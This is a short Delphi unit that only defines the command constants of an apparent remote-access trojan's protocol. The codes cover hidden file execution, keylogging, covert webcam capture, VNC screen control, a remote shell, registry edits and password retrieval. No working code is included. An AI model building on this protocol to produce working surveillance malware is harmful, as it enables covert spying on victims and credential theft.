unit uCommands;
interface
const
  //Sockets
  SOCK_MAIN = 1;
  SOCK_TRANSFER = 2;
  SOCK_VNC = 3;
  SOCK_CAM = 4;
  // Packets
  PACK_AUTH = $01;
  PACK_RESTART = $02;
  PACK_CLOSE = $03;
  PACK_UNINSTALL = $04;
  PACK_GETDRIVES = $05;
  PACK_GETDIRS = $06;
  PACK_GETFILES = $07;
  PACK_EXECUTEFILEVISIBLE = $08;
  PACK_EXECUTEFILEHIDDEN = $09;
  PACK_DELETEFILE = $0A;
  PACK_MOVEFILE = $0B;
  PACK_TRANSFERFILE = $0C;
  PACK_DOWNLOADFILE = $0D;
  PACK_UPLOADFILE = $0E;
  PACK_PROCESSES = $0F;
  PACK_TERMINATEPROCESS = $10;
  PACK_ENUMWINDOW = $11;
  PACK_WINDOWMAX = $12;
  PACK_WINDOWMIN = $13;
  PACK_WINDOWCLOSE = $14;
  PACK_ENUMSERVICE = $15;
  PACK_STOPSERVICE = $16;
  PACK_STARTSERVICE = $17;
  PACK_REQUESTVNC = $18;
  PACK_VNCSOCKET = $19;
  PACK_STARTVNC = $1A;
  PACK_VNCDATA = $1B;
  PACK_ENUMKEYS = $1C;
  PACK_ENUMVALUES = $1D;
  PACK_SHELLSTART = $1E;
  PACK_SHELLSTOP = $1F;
  PACK_SHELLDATA = $21;
  PACK_REGADD = $22;
  PACK_REGDELETE = $23;
  PACK_REGRENAME = $24;
  PACK_KEYLOGSEND = $25;
  PACK_KEYLOGREQUEST = $26;
  PACK_CAMSOCKET = $27;
  PACK_GETCAMLIST = $28;
  PACK_STARTCAM = $29;
  PACK_GETCAM = $2A;
  PACK_STOPCAM = $2B;
  PACK_FILESTART = $2C;
  PACK_VNCPROCESS = $2D;
  PACK_VNCDELTA = $2E;
  PACK_CAMDATA = $2F;
  PACK_COMPRESSEDDOWNLOADFILE = $30;
  PACK_COMPRESSEDTRANSFERFILE = $31;
  PACK_QUERYCOMPRESSEDFILE = $32;
  PACK_QUERYFILE = $33;
  PACK_PING = $34;
  PACK_PONG = $35;
  PACK_SHORTCUT = $36;
  PACK_VNCKEY = $37;
  PACK_VNCLEFT = $38;
  PACK_VNCRIGHT = $39;
  PACK_DIRCREATE = $3A;
  PACK_DIRDELETE = $3B;
  PACK_DIRRENAME = $3C;
  PACK_GETPASSWD = $3D;
implementation

end.
